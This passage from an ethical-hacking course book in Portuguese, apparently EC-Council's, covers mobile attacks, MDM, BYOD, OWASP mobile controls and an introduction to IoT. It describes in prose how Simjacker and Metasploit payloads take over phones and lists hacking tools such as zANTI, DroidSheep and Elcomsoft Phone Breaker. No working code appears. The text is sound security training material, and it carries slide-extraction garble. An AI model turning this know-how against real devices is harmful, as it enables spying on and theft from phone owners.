ÿ A vítima recebe o SMS malicioso e o navegador S@T no cartão SIM

reconhece e processa automaticamente as instruções ou códigos ocultos
ÿ O código injetado executa várias atividades no dispositivo sem o consentimento do usuário
ÿ O dispositivo cúmplice recebe as informações do usuário via SMS, que um invasor pode usar para rastrear
locais ao vivo, exfiltrar as informações do dispositivo e realizar muitas outras atividades maliciosas

Figura 9.11: Explorando a vulnerabilidade do Simjacker

Hackeando um
Dispositivo Android
Usando Metasploit
Os invasores usam várias ferramentas, como

Metasploit para criar cargas binárias, que são
enviadas para o dispositivo Android de destino
para obter controle sobre ele
Hackeando um dispositivo Android usando o Metasploit
Os invasores usam várias ferramentas, como o Metasploit, para criar cargas binárias, que são enviadas ao
dispositivo Android de destino para obter controle sobre ele. O Metasploit Framework é uma plataforma
modular de teste de penetração baseada em Ruby que permite escrever, testar e executar código de exploração.
ÿ Metasploit
Fonte: https:// www.metasploit.com
O Metasploit Framework contém um conjunto de ferramentas que você pode usar para testar
vulnerabilidades de segurança, enumerar redes, executar ataques e evitar a detecção. Meterpreter
é uma carga de ataque Metasploit que fornece um shell interativo que pode ser usado para explorar
as máquinas de destino e executar o código.

Figura 9.12: captura de tela do Metasploit

Ferramentas para hackear Android

Um aplicativo Android que permite realizar ataques, como
ZANTI endereço MAC falso, criação de um ponto de acesso Wi-Fi
Spoofer de rede
malicioso e sessão de sequestro https:// www.digitalsquid.co.uk
Canhão de íons de baixa órbita

(LOIC) https:// droidinformer.org
DroidSheep
https:// droidsheep.info
Orbot Proxy
https:// guardianproject.info
https:// www.zimperium.com
PhoneSploit
https:// github.com
Ferramentas para hackear Android
Os invasores usam várias ferramentas de hacking do Android para identificar vulnerabilidades e explorar os dispositivos
móveis de destino para obter informações críticas do usuário, como credenciais, informações pessoais e listas de contatos.
ÿ ZANTI
Fonte: https:// www.zimperium.com
zANTI é um aplicativo Android que permite realizar os seguintes ataques:
o Endereço MAC falso
o Criar ponto de acesso Wi-Fi malicioso para capturar vítimas para controlar e sequestrar seu dispositivo
tráfego
o Procurar portas abertas
o Explorar vulnerabilidades do roteador
o Auditorias de complexidade de senha
o Ataque MITM e DoS
o Exibir, modificar e redirecionar todas as solicitações e respostas HTTP
o Redirecionar HTTPS para HTTP; redirecione a solicitação HTTP para um determinado IP ou página da web
o Inserir código HTML em páginas da web
o Sessões de sequestro
o Visualizar e substituir todas as imagens transmitidas pela rede
o Capturar e interceptar downloads

Figura 9.13: Captura de tela do zANTI
Algumas ferramentas adicionais de hackers para Android são as seguintes:
ÿ Spoofer de rede (https:// www.digitalsquid.co.uk)
ÿ Canhão de íons de baixa órbita (LOIC) (https:// droidinformer.org)
ÿ DroidSheep (https:// droidsheep.info)
ÿ Orbot Proxy (https:// guardianproject.info)
ÿ PhoneSploit (https:// github.com)

Ferramentas para hackear iOS
Elcomsoft Permite que invasores realizem aquisição lógica e over-the-air de dispositivos

Telefone iOS, invadam backups criptografados e obtenham e analisem backups, dados
Disjuntor sincronizados e senhas do Apple iCloud
Fing - Scanner de rede

https:// apps.apple.com
Mestre do analisador de rede

Espião
https:// spyic.com
iWepPRO
Frida
https:// www.frida.re
https:// www.elcomsoft.com
Ferramentas para hackear iOS
Várias ferramentas usadas por invasores para hackear dispositivos móveis iOS de destino são discutidas abaixo:
ÿ Disjuntor de telefone Elcomsoft
Fonte: https:// www.elcomsoft.com
O Elcomsoft Phone Breaker permite que invasores realizem aquisição lógica e over-the-air de dispositivos iOS, invadam
backups criptografados e obtenham e analisem backups, dados sincronizados e senhas do Apple iCloud. Ele permite que
os invasores quebrem senhas e descriptografem backups do iOS com aceleração de GPU. Usando esta ferramenta, os
invasores podem descriptografar o iCloud Keychain e mensagens com arquivos de mídia e documentos do iCloud.

Figura 9.14: Captura de tela do Elcomsoft Phone Breaker
Algumas ferramentas adicionais para hackear dispositivos iOS estão listadas abaixo:
ÿ Fing - Scanner de Rede (https:// apps.apple.com)

ÿ Network Analyzer Master (https:// apps.apple.com)
ÿ Spyic (https:// spyic.com)
ÿ iWepPRO (https:// apps.apple.com)
ÿ Frida (https:// www.frida.re)

Fluxo do módulo

Anatomia de ataque
01 04 Contramedidas
Entenda o conceito de gerenciamento de dispositivos móveis (MDM)

O gerenciamento de dispositivos móveis (MDM) está ganhando importância considerável com a adoção de
políticas como BYOD nas organizações. O crescente número e tipos de dispositivos móveis, como
smartphones, laptops, tablets e assim por diante, tornou difícil para as empresas fazer políticas e gerenciar
esses dispositivos com segurança. MDM é uma política que ajuda a lidar com esses dispositivos com
cuidado, garantindo sua segurança. As empresas utilizam uma espécie de software de segurança para a
administração de todos os dispositivos móveis conectados à rede corporativa.
Esta seção trata dos conceitos de MDM que ajudam a proteger, monitorar, gerenciar e oferecer suporte a
dispositivos móveis.

Gerenciamento de dispositivos móveis (MDM)

Mobile Device Management (MDM) fornece plataformas para distribuição over-the-air ou com fio de aplicativos e dados e definições de configuração
para todos os tipos de dispositivos móveis, incluindo telefones celulares, smartphones e tablets
Ele ajuda os administradores de sistema a implantar e gerenciar aplicativos de software em todos os dispositivos móveis corporativos para proteger,
monitorar, gerenciar e oferecer suporte a dispositivos móveis
janelas
Smartphone
Arquivo Diretórios e
Sistema bancos de dados

Firewall
iPad telefone do Windows

Sem fio Internet
DMZ Administrativo MDM

Console Servidor
Tablet PC Iphone
Gerenciamento de dispositivos móveis (MDM)
O MDM fornece plataformas para distribuição com ou sem fio de aplicativos, dados e definições de configuração para
todos os tipos de dispositivos móveis, incluindo telefones celulares, smartphones, tablets e assim por diante. Ele ajuda
na implementação de políticas em toda a empresa para reduzir custos de suporte, descontinuidade de negócios e riscos
de segurança. Ele ajuda os administradores de sistema a implantar e gerenciar aplicativos de software em todos os
dispositivos móveis corporativos para proteger, monitorar, gerenciar e dar suporte a esses dispositivos. Ele pode ser
usado para gerenciar dispositivos de propriedade da empresa e de propriedade do funcionário (BYOD) em toda a
empresa. Exemplos de soluções MDM incluem IBM MaaS360, Citrix Endpoint Management, VMware AirWatch e assim
por diante.
Os recursos básicos do software MDM são os seguintes:
ÿ Usa uma senha para o dispositivo
ÿ Bloqueia remotamente o dispositivo em caso de perda
ÿ Limpa dados remotamente no dispositivo perdido ou roubado
ÿ Detecta se o dispositivo está enraizado ou com jailbreak
ÿ Aplica políticas e rastreia o inventário
ÿ Executa monitoramento e relatórios em tempo real

Figura 9.15: Esquema de gerenciamento de dispositivos móveis (MDM)

Traga seu próprio dispositivo (BYOD)

ÿ Traga seu próprio dispositivo (BYOD) refere-se a uma política que permite que um funcionário traga seus dispositivos pessoais, como
laptops, smartphones e tablets ao local de trabalho e usá-los para acessar os recursos da organização seguindo os privilégios de acesso
ÿ A política BYOD permite que os funcionários usem os dispositivos com os quais se sentem confortáveis e que melhor se adaptam às suas preferências
e propósitos de trabalho
Benefícios BYOD
01
03
Produtividade aumentada
flexibilidade de trabalho
02 04
Satisfação do empregado Custos mais baixos
Traga seu próprio dispositivo (BYOD)
BYOD refere-se a uma política que permite que os funcionários tragam seus dispositivos pessoais, como laptops,
smartphones e tablets, para o local de trabalho e os usem para acessar os recursos da organização de acordo com
seus privilégios de acesso.
O BYOD permite que os funcionários usem dispositivos com os quais se sintam confortáveis e que melhor se adaptem
às suas preferências e propósitos de trabalho. Com uma estratégia de “trabalhar em qualquer lugar, a qualquer hora”, o
desafio para a tendência BYOD é proteger os dados da empresa e atender aos requisitos de conformidade.
Benefícios BYOD
A adoção do BYOD é vantajosa tanto para a empresa quanto para o funcionário. Alguns dos benefícios do BYOD são
discutidos abaixo:
ÿ Aumento da Produtividade: Os funcionários tornam-se especialistas no uso de seus dispositivos pessoais e isso
aumenta sua produtividade. Além disso, os usuários tendem a atualizar seus dispositivos pessoais com
tecnologias de ponta para que a empresa possa se beneficiar dos recursos mais recentes (tanto de software
quanto de hardware) do dispositivo.
ÿ Satisfação do funcionário: Ao implementar o BYOD, os funcionários usam dispositivos de sua própria escolha,
que investem em si mesmos sem o envolvimento da empresa. Além disso, os funcionários ficam mais
confortáveis com seus dispositivos pessoais, pois eles contêm dados pessoais e dados corporativos, eliminando
o uso de vários dispositivos.
ÿ Flexibilidade de Trabalho: Ao praticar o BYOD, os funcionários podem carregar um único dispositivo para
atender às suas necessidades pessoais e profissionais. O trabalho que normalmente é feito no escritório pode
ser feito de qualquer lugar do mundo, pois os funcionários têm acesso aos dados corporativos. Os usuários de
BYOD têm mais liberdade, pois suas empresas não impõem regras rígidas que

eles teriam que seguir ao usar a propriedade da empresa. O BYOD substitui o modelo cliente-servidor
tradicional por uma estratégia móvel e centrada na nuvem, que pode trazer benefícios de longo alcance.
ÿ Custos mais baixos: uma empresa que adota BYOD não precisa gastar com dispositivos, mas economiza
dinheiro, pois os funcionários compram seus próprios dispositivos. Além disso, o custo dos serviços de
dados passa para os funcionários, que podem cuidar melhor de seu próprio patrimônio (dispositivo).

Riscos BYOD
01 02 03 04
Compartilhamento de dados Vazamento de dados e Descarte de dispositivos de Suporte para muitos
confidenciais em redes não seguras problemas de segurança de endpoint forma inadequada dispositivos diferentes
05 06 07 08
Misturar dados Dispositivos perdidos Falta de consciência Capacidade de ignorar
pessoais e privados ou roubados as políticas de rede
da organização
Riscos BYOD
Funcionários que se conectam à rede corporativa ou acessam dados corporativos usando seus próprios dispositivos móveis
representam riscos de segurança para a organização. Alguns riscos de segurança BYOD estão listados abaixo:
ÿ Compartilhamento de dados confidenciais em redes não seguras: os funcionários podem acessar dados
corporativos por meio de uma rede pública. Essas conexões não podem ser criptografadas; compartilhar dados
confidenciais por meio de uma rede não segura pode levar ao vazamento de dados.
ÿ Vazamento de dados e problemas de segurança de terminais: nesta era da computação em nuvem, os dispositivos
móveis são terminais inseguros com conectividade em nuvem. Ao sincronizar com e-mail organizacional ou outros
aplicativos, esses dispositivos móveis carregam informações confidenciais. Se o dispositivo for perdido, ele poderá
expor todos os dados corporativos.
ÿ Descarte inadequado de dispositivos: um dispositivo descartado incorretamente pode conter uma grande
quantidade de informações confidenciais, como informações financeiras, detalhes de cartão de crédito, números
de contato e dados corporativos. Portanto, é importante garantir que o dispositivo não contenha nenhum dado
antes de ser descartado ou repassado a terceiros.
ÿ Suporte para muitos dispositivos diferentes: as organizações permitem que os funcionários acessem seus recursos
de qualquer lugar do mundo, aumentando a produtividade e aumentando a satisfação dos funcionários. No entanto,
o suporte para diferentes dispositivos e processos pode aumentar os custos.
Os dispositivos de propriedade dos funcionários têm segurança limitada e vêm com uma variedade de plataformas.
Isso impede a capacidade do departamento de TI de gerenciar e controlar todos os dispositivos de uma empresa.

ÿ Misturar dados pessoais e privados: Misturar dados pessoais e corporativos em dispositivos móveis leva a
sérias implicações de segurança e privacidade. Portanto, é uma boa prática manter os dados corporativos
separados dos dados pessoais do funcionário; isso ajuda uma organização a aplicar medidas de segurança
específicas, como criptografia, para proteger os dados corporativos críticos armazenados no dispositivo móvel.
Além disso, torna-se fácil para a organização limpar remotamente os dados corporativos sem afetar os dados
pessoais do funcionário quando um funcionário sai da organização.
ÿ Dispositivos perdidos ou roubados: devido ao seu pequeno tamanho, os dispositivos móveis são frequentemente perdidos ou roubados.
Quando um funcionário perde seu dispositivo móvel usado para fins pessoais e oficiais, a organização pode
enfrentar um risco de segurança, pois os invasores podem comprometer os dados corporativos armazenados
no dispositivo perdido.
ÿ Falta de conscientização: as organizações devem educar seus funcionários sobre questões de segurança BYOD.
Deixar de fazer isso pode resultar no comprometimento dos dados corporativos armazenados em dispositivos
móveis.
ÿ Capacidade de ignorar as regras de política de rede da organização: de acordo com seus requisitos específicos,
as políticas impostas podem diferir entre redes com fio e redes sem fio. Os dispositivos BYOD conectados a
redes sem fio têm a capacidade de ignorar as regras de política de rede da organização aplicadas apenas em
LANs com fio.
ÿ Questões de infraestrutura: Um programa BYOD envolve lidar com várias plataformas e tecnologias. Nem todos
os funcionários carregam os mesmos dispositivos. Diferentes dispositivos, cada um executando um sistema
operacional e programas diferentes, vêm com suas próprias brechas de segurança. Assim, pode ser problemático
para um departamento de TI configurar e manter a infraestrutura para atender às necessidades de diferentes
dispositivos, como gerenciamento de dados, segurança, backup e compatibilidade entre dispositivos.
ÿ Funcionários insatisfeitos : funcionários insatisfeitos em uma organização podem fazer uso indevido de dados
corporativos armazenados em seus dispositivos móveis. Eles também podem vazar informações confidenciais
para os concorrentes.

Fluxo do módulo

Anatomia de ataque
01 04 Contramedidas
Discutir contramedidas de ataque móvel
Assim como os computadores pessoais, os dispositivos móveis armazenam dados confidenciais e podem
ser suscetíveis a várias ameaças. Portanto, é melhor protegê-los para evitar o comprometimento ou perda
de dados confidenciais, reduzir o risco de várias ameaças, como vírus e cavalos de Tróia, e mitigar outras
formas de abuso. Para proteger esses dispositivos, deve-se adotar medidas rígidas e usar ferramentas de
segurança.
Esta seção trata de várias diretrizes de segurança móvel e ferramentas de proteção móvel que ajudam a
proteger os dispositivos móveis.

Os 10 principais controles móveis da OWASP
Identifique e proteja dados confidenciais no dispositivo móvel Integração segura de dados com serviços e
aplicativos de terceiros
Manuseie as credenciais de senha com segurança no Prestar especial atenção à recolha e armazenamento
dispositivo do consentimento para a recolha e utilização dos dados do
utilizador
Garanta que os dados confidenciais sejam protegidos em Implemente controles para impedir o acesso não
transito autorizado a recursos pagos
Implemente autenticação de usuário, autorização e Garanta a distribuição/provisionamento seguro de

gerenciamento de sessão corretamente aplicativos móveis
Mantenha as APIs de back-end (serviços) e a plataforma Verifique cuidadosamente qualquer interpretação de tempo de execução do
(servidor) seguras código em busca de erros
Os 10 principais controles móveis da OWASP
1. Identifique e proteja dados confidenciais no dispositivo móvel
o Na fase de projeto, classifique o armazenamento de dados de acordo com a sensibilidade e depois aplique os controles.
Processe, armazene e use dados com base em sua classificação
o Aplicar a validação da segurança das chamadas de API aos dados confidenciais
o Armazene os dados confidenciais no servidor em vez do dispositivo do lado do cliente, pois oferece suporte à conectividade de
rede segura e outros mecanismos de proteção
o Use a API de criptografia de arquivos fornecida pelo sistema operacional ou outra fonte confiável ao armazenar dados
em um dispositivo.
o Use criptografia para armazenar dados confidenciais e armazene-os em uma área inviolável, se possível
o Restrinja o acesso a dados confidenciais com base em informações contextuais, por exemplo, localização
o Certifique-se sempre de desligar a localização, rastreamento de GPS ou outros

informações quando não estiver em uso
o Esteja sempre atento ao armazenamento compartilhado público, pois ele é facilmente vulnerável a dados
vazamento
o Aplicar o princípio da divulgação mínima e identificar o tipo de dados necessários no

fase de desenho
o Use identificadores não persistentes sempre que possível, que não sejam compartilhados com outros
aplicativos


o Os aplicativos devem usar APIs remotas de limpeza e interrupção para remoção de dados confidenciais
informações do dispositivo em caso de roubo ou perda
2. Manuseie as credenciais de senha com segurança no dispositivo
o Use tokens de autorização de longo prazo em vez de senhas de acordo com o modelo OAuth
e criptografar tokens em trânsito usando SSL/TLS
o Aproveite os mecanismos de criptografia e armazenamento de chaves fornecidos pelo sistema operacional

móvel para armazenar com segurança senhas e tokens de autorização
o Certifique-se de que recursos como elemento seguro sejam usados para armazenar chaves, credenciais e outros
dados confidenciais
o Permitir acesso a usuários móveis para alterar as senhas no dispositivo
o Certifique-se de usar medidas que permitam padrões repetidos para conter os ataques de manchas
o Certifique-se de que nenhuma senha ou chave esteja visível no cache ou logs
o Não armazene senhas ou segredos nos binários do aplicativo móvel, pois eles podem
ser facilmente baixado e submetido a engenharia reversa
3. Certifique-se de que os dados confidenciais sejam protegidos em trânsito
o Imponha o uso de um canal seguro de ponta a ponta, como SSL/TLS, ao enviar

informações confidenciais na rede
o Use algoritmos de criptografia complexos e conhecidos, como AES, com comprimentos de chave apropriados
para maior segurança
o Garanta o uso de certificados assinados por provedores de CA confiáveis e não desative ou

ignorar a validação da cadeia SSL
o Uma conexão segura deve ser estabelecida somente após a verificação da identidade do
ponto final remoto para reduzir o risco de ataques MITM
o O envio de dados confidenciais usando SMS ou MMS de ou para os terminais móveis deve
ser evitado
4. Implemente a autenticação, autorização e gerenciamento de sessão do usuário corretamente
o A força do mecanismo de autenticação deve depender da sensibilidade dos dados que estão sendo processados
pelo aplicativo e seu acesso a recursos valiosos
o Certifique-se de que o gerenciamento de sessão seja tratado adequadamente após a autenticação inicial usando
protocolos seguros apropriados
o Use identificadores de sessão imprevisíveis com alta entropia e aplicação repetida de

SHA1 para combinar variáveis aleatórias
o Use contextos como localização de IP para adicionar segurança à autenticação
o Garantir o uso de fatores de autenticação adicionais para aplicativos móveis que dão acesso a dados confidenciais
usando voz, impressão digital ou outras entradas comportamentais

o Use a autenticação que depende da identidade do usuário final em vez do dispositivo

identidade
5. Mantenha as APIs de back-end (serviços) e a plataforma (servidor) seguras
o Executar verificação de código detalhada para dados confidenciais que são transferidos acidentalmente entre o
dispositivo móvel, back-end do servidor web e outras interfaces externas
o Todos os serviços de back-end para os aplicativos móveis devem ser testados para vulnerabilidades
periodicamente usando qualquer ferramenta de análise de código estático e ferramentas fuzzing
o Certifique-se de que a plataforma de back-end esteja sendo executada com uma configuração reforçada com o
patches de segurança mais recentes aplicados ao sistema operacional e servidor web
o Logs adequados são reservados no back-end para detectar e responder a incidentes

e para a realização de perícia
o Use limitação de taxa e estrangulamento por usuário/IP para reduzir o risco de DDoS
ataques
o Garantir o teste de vulnerabilidades de DoS que tornam o servidor inundado com recursos
chamadas intensivas de aplicativos
o Realizar testes de casos de uso e testes de casos de abuso para determinar as vulnerabilidades;
também realizar testes dos serviços da web de back-end/REST
6. Integração segura de dados com serviços e aplicativos de terceiros
o Sempre examine a autenticidade de qualquer código ou biblioteca de terceiros usados no aplicativo móvel
o Atualize regularmente os patches de segurança mais recentes e acompanhe todas as APIs de terceiros
e quadro
o Validar todos os dados recebidos e enviados antes do processamento por terceiros não confiáveis
formulários
7. Preste atenção especial à coleta e armazenamento de consentimento para a coleta e

uso dos dados do usuário
o Crie uma política de privacidade que abranja o uso de dados pessoais e os disponibilize aos usuários ao fazer
escolhas de consentimento, como no momento da instalação ou da execução ou por meio de mecanismos de
exclusão
o Verifique se algum aplicativo está coletando informações de identificação pessoal (PII)
o Revise os mecanismos de comunicação para verificar se há vazamentos acidentais
o Sempre preserve o registro de consentimento para a transferência de PII
o Certifique-se de que o mecanismo de coleta de consentimento não se sobreponha ou entre em conflito e tente
resolver quaisquer conflitos

8. Implemente controles para impedir o acesso não autorizado a recursos pagos (carteira, SMS,
telefonemas, etc.)
o Manter logs de acesso a recursos pagos em um formato não repudiável e disponibilizá-los para monitoramento
do usuário final
o Verifique regularmente quaisquer padrões de uso anormais no uso de recursos pagos e

ativar reautenticação
o Garantir o uso do modelo de lista branca por padrão para lidar com recursos pagos
o Autenticar todas as chamadas de API para recursos pagos
o Certifique-se de que os retornos de chamada da API da carteira não permitem senhas de texto não criptografado e outros
informação sensível
o Alerte os usuários e obtenha permissão para qualquer tipo de implicação de custo para o aplicativo
atuação
o Implemente as melhores práticas, como baixa latência e cache, para minimizar a carga de sinalização nas
estações base
9. Garantir a distribuição/provisionamento seguro de aplicativos móveis
o Os aplicativos devem ser projetados e provisionados para permitir atualizações para segurança
remendos
o As lojas de aplicativos devem monitorar os aplicativos em busca de códigos vulneráveis e devem ser capazes de
remover aplicativos remotamente em curto prazo no caso de um incidente
o Fornecer um canal de feedback para os usuários relatarem problemas de segurança com os aplicativos
10. Verifique cuidadosamente qualquer interpretação de código em tempo de execução em busca de erros
o Minimizar a interpretação de tempo de execução e os recursos oferecidos aos intérpretes de tempo de execução
e executar interpretadores com privilégios mínimos
o Descreva a sintaxe de escape abrangente conforme apropriado
o Use interpretadores de teste fuzz e interpretadores sandbox

Diretrizes Gerais para Segurança de Plataformas Móveis
1 2 3 4
Não carregue muitos Execute uma segurança Manter o controle de Instale aplicativos de
aplicativos e evite o upload Avaliação do configuração e lojas de aplicativos
automático de fotos para Inscrição gerenciamento confiáveis
redes sociais Arquitetura
5 6 7 8
Limpe ou exclua os dados Não compartilhe Desative o acesso Nunca conecte duas
com segurança ao descartar informações dentro sem fio, como Wi-Fi e redes separadas, como
o dispositivo Aplicativos habilitados para Bluetooth, se não estiver Wi-Fi e
GPS, a menos que necessário em uso Bluetooth,
simultaneamente
Diretrizes Gerais para Segurança de Plataformas Móveis
Abaixo estão várias diretrizes que ajudam você a proteger seu dispositivo móvel:
ÿ Não carregue muitos aplicativos e evite o upload automático de fotos para redes sociais
ÿ Realizar uma avaliação de segurança da arquitetura do aplicativo
ÿ Manter controle e gerenciamento de configuração
ÿ Instale aplicativos de lojas de aplicativos confiáveis
ÿ Limpe ou exclua com segurança os dados ao descartar o dispositivo
ÿ Não compartilhe as informações em aplicativos habilitados para GPS, a menos que seja necessário
ÿ Nunca conecte duas redes separadas, como Wi-Fi e Bluetooth simultaneamente
ÿ Desative o acesso sem fio, como Wi-Fi e Bluetooth, se não estiver em uso
o Certifique-se de que seu Bluetooth esteja “desligado” por padrão. Ligue-o sempre que for necessário
o Desative o acesso sem fio, como Wi-Fi e Bluetooth, se não estiver em uso para evitar
acesso sem fio ao dispositivo
o Desativar conexões de Internet de compartilhamento/tethering por Wi-Fi e Bluetooth quando não

em uso
ÿ Usar Senha
o Configure uma senha forte com o comprimento máximo possível para obter acesso
seus dispositivos móveis
o Defina um tempo limite de inatividade para bloquear automaticamente o telefone quando não estiver em uso

o Ative o recurso de bloqueio/limpeza após um determinado número de tentativas
o Considere uma senha complexa de oito caracteres
o Impedir a adivinhação da senha: defina apagar dados como LIGADO
ÿ Atualizar sistema operacional e aplicativos
o Atualize o sistema operacional e os aplicativos para mantê-los seguros
o Aplicar atualizações de software quando novas versões estiverem disponíveis
o Realizar manutenção regular do software
ÿ Habilitar Gerenciamento Remoto
o Em um ambiente corporativo, use o software MDM para proteger, monitorar, gerenciar e

dar suporte a dispositivos móveis implantados em toda a organização
ÿ Não permitir enraizamento ou jailbreak o Certifique-
se de que suas soluções MDM impeçam ou detectem rooting/jailbreaking
o Inclua esta cláusula em sua política de segurança móvel
ÿ Use Serviços de Limpeza Remota
o Use serviços de limpeza remota, como Find My Device (Android) e Find My iPhone ou
FindMyPhone (Apple iOS) para localizar seu dispositivo caso ele seja perdido ou roubado
o Relate um dispositivo perdido ou roubado ao departamento de TI para que eles possam desabilitar certificados e outros
métodos de acesso associados ao dispositivo
ÿ Criptografar armazenamento
o Se compatível, configure seu dispositivo móvel para criptografar seu armazenamento com hardware
criptografia
o Use criptografia de dispositivo e aplicativos de patch
o Criptografar o dispositivo e os backups
ÿ Realizar backup e sincronização periódicos
o Use uma ferramenta segura de backup e restauração over-the-air que executa

sincronização de fundo
o (Android) Backup para sua conta do Google para que os dados corporativos confidenciais não sejam copiados para a nuvem
o Controlar a localização dos backups
o Criptografar backups
o Mantenha os dados confidenciais fora de dispositivos móveis compartilhados. Se as informações corporativas estiverem
armazenadas localmente em um dispositivo, é recomendável que esse dispositivo não seja compartilhado abertamente
o Limite os dados de registro armazenados no dispositivo
o Use um utilitário seguro de transferência de dados ou criptografe os dados em trânsito de ou para o dispositivo, para garantir
a confidencialidade e a integridade dos dados

Ferramentas de segurança móvel
Segurança Malwarebytes
ÿ Uma ferramenta móvel antimalware que fornece proteção contra

malware, ransomware e outras ameaças crescentes para
dispositivos Android
Lookout Pessoal Zimperium's zIPS BullGuard Mobile Security Norton Security para Comodo Mobile
https:// www.lookout.com https:// www.zimperium.com https:// www.bullguard.com iOS https:// Security https://
us.norton.com m.comodo.com
Ferramentas de segurança móvel
ÿ Segurança Malwarebytes
Fonte: https:// play.google.com
Malwarebytes é uma ferramenta móvel antimalware que fornece proteção contra malware, ransomware e outras
ameaças crescentes para dispositivos Android. Ele bloqueia, detecta e remove adware e malware; realiza
auditorias de privacidade para todos os aplicativos; e garante uma navegação mais segura.

Figura 9.16: Captura de tela do Malwarebytes Security
Algumas ferramentas adicionais de proteção móvel são as seguintes:
ÿ Lookout Pessoal (https:// www.lookout.com)

ÿ zIPS da Zimperium (https:// www.zimperium.com)
ÿ BullGuard Mobile Security (https:// www.bullguard.com)
ÿ Norton Security para iOS (https:// us.norton.com)
ÿ Comodo Mobile Security (https:// m.comodo.com)

Resumo do Módulo
Este módulo discutiu a anatomia do

Ele também discutiu dispositivos móveis
1 ataque móvel e 4 conceitos de gestão
Os 10 principais riscos móveis da OWASP
Finalmente, este módulo terminou com

Ele discutiu o ataque móvel
uma discussão detalhada sobre mobile
2 vetores e vulnerabilidades em detalhes 5 contramedidas de ataque e
ferramentas de segurança móvel

Tem demonstrado vários em detalhes vários IoT
3 Ferramentas de hacking para Android e iOS
6 e ataques OT e seus
contramedidas
Resumo do Módulo
Este módulo discutiu a anatomia do ataque móvel e os 10 principais riscos móveis do OWASP. Ele também
discutiu os vetores de ataque móvel e as vulnerabilidades em detalhes, bem como demonstrou várias
ferramentas de hacking para Android e iOS. Além disso, também discutiu os conceitos de gerenciamento
de dispositivos móveis. Finalmente, o módulo terminou com uma discussão detalhada sobre contramedidas
de ataque móvel e ferramentas de segurança móvel.
No próximo módulo, discutiremos em detalhes os vários ataques IoT e OT e seus

contramedidas.
MT
CE-Conselho
EC-Council
E
Ethical
HE
Hacking Essentials
Módulo 10
Ataques e contramedidas IoT e OT

1 Entendendo os conceitos de IoT
2 Noções básicas sobre ataques de IoT e ferramentas de ataque de IoT
Visão geral das contramedidas de ataques IoT e

3 Ferramentas de segurança
4 Compreendendo os conceitos de OT
5 Compreendendo ataques OT e ferramentas de ataque OT
Visão geral das contramedidas de ataque OT e ferramentas

6 de segurança
A Internet das Coisas (IoT) evoluiu da convergência da tecnologia sem fio, sistemas microeletromecânicos,
microsserviços e a Internet. A IoT introduziu uma série de novas tecnologias com recursos associados em nossas vidas
diárias. Por ser um campo em evolução, a imaturidade de tecnologias e serviços fornecidos por diversos fornecedores
terá um amplo impacto nas organizações, levando a problemas complexos de segurança. A segurança da IoT é difícil
de garantir, pois os dispositivos usam processadores simples e sistemas operacionais simplificados que podem não
suportar abordagens de segurança sofisticadas. As organizações que usam esses dispositivos como parte de sua rede
precisam proteger os dispositivos e as informações dos invasores.
As empresas industriais estão digitalizando suas instalações industriais para aumentar a eficiência operacional por meio
de conectividade com a Internet e acesso remoto a dados; nesse cenário, elas precisam cada vez mais focar na
segurança cibernética para mitigar novas ameaças e problemas de segurança decorrentes da convergência de tecnologia
operacional e tecnologia da informação (OT–TI). As organizações precisam entender o cenário de ameaças cibernéticas,
infraestrutura industrial e negócios.
Antes de implementar políticas e controles de segurança cibernética, as organizações precisam identificar e priorizar os
principais riscos e ameaças que terão maior impacto em seus negócios.
O principal objetivo deste módulo é explicar as possíveis ameaças às plataformas IoT e OT e fornecer diretrizes para
proteger os dispositivos IoT e a infraestrutura OT contra ameaças e ataques em evolução.
ÿ Explicar os conceitos de IoT
ÿ Compreender as diferentes ameaças e ataques de IoT

ÿ Use diferentes ferramentas de ataque IoT
ÿ Aplicar contramedidas para proteger dispositivos contra ataques de IoT
ÿ Use diferentes ferramentas de segurança IoT
ÿ Explicar os conceitos de OT
ÿ Compreender as diferentes ameaças e ataques OT
ÿ Use diferentes ferramentas de ataque OT
ÿ Aplicar contramedidas para proteger instalações industriais de ataques OT
ÿ Use diferentes ferramentas de segurança OT

Ataques IoT
Ataques IoT

Fluxo do módulo
1 Entenda os conceitos de IoT
Discutir ameaças de IoT e

2 Ataques
Discutir ataque IoT

3 Contramedidas
Entenda os conceitos de IoT

A IoT é um tópico importante e emergente no campo da tecnologia, economia e sociedade em geral. É conhecida
como a rede de dispositivos conectados, possibilitada pela interseção entre as comunicações máquina a máquina e
a análise de big data. A IoT é um desenvolvimento voltado para o futuro da Internet e das habilidades dos
dispositivos físicos que estão diminuindo gradualmente a distância entre o mundo virtual e o físico. Esta seção trata
de alguns dos conceitos importantes de IoT com os quais se deve estar familiarizado para entender os tópicos
avançados abordados posteriormente neste módulo.

O que é IoT?
ÿ Internet of Things (IoT), também conhecida como Internet of Everything (IoE), refere-se à rede de
dispositivos com endereços IP e a capacidade de detectar, coletar e enviar dados usando
sensores embutidos, hardware de comunicação e processadores
ÿ Em IoT, o termo coisa é usado para se referir a um dispositivo que é implantado em objetos
naturais, feitos pelo homem ou feitos por máquinas e tem a funcionalidade de se comunicar pela rede
Dispositivos Industriais Inteligente

Dispositivos vestíveis
Ferramentas
Ver
Manufatura Vestível
televisões
Transporte
IoT
Saúde Monitoramento
Checar
Dispositivos
Termostato
Drogas Energia
Dispositivos de saúde Dispositivos domésticos
O que é IoT?
A Internet das Coisas (IoT), também conhecida como Internet de Todas as Coisas (IoE), refere-se a dispositivos de
computação habilitados para a Web e com capacidade de detectar, coletar e enviar dados usando sensores, hardware
de comunicação e processadores que estão embutidos no dispositivo. Na IoT, uma “coisa” refere-se a um dispositivo
que é implantado em um objeto natural, feito pelo homem ou feito por uma máquina e tem a funcionalidade de se
comunicar por meio de uma rede. A IoT utiliza a tecnologia emergente existente para detecção, rede e robótica,
permitindo, portanto, que o usuário obtenha análise, automação e integração mais profundas em um sistema.
Com o aumento dos recursos de rede de máquinas e aparelhos usados em diferentes setores, como escritórios,
residências, indústria, transporte, edifícios e dispositivos vestíveis, eles abrem um mundo de oportunidades para
melhorar os negócios e a satisfação do cliente. Alguns dos principais recursos da IoT são conectividade, sensores,
inteligência artificial, pequenos dispositivos e engajamento ativo.
Figura 10.1: Ilustração de dispositivos IoT

Como funciona a IoT Como funciona a IoT
Umidade/Umidade Umidade/Umidade
Armazenamento de dados/ Armazenamento de dados/
Nuvem Servidor Nuvem

Servidor
Temperatura
Temperatura Enviar
Enviardados
dados
receber comando
receber comando
Gateway IoT Gateway IoT
Pressão
Pressão
Internet
Internet
Som/Vibração
Som/Vibração
Dispositivos IoT IoT

Dispositivos controle remoto
Controle usando o
aplicativo
Aplicativomóvel usando o celular

Copyright
A reprodução
© por
é estritamente
EC-Council. Todos
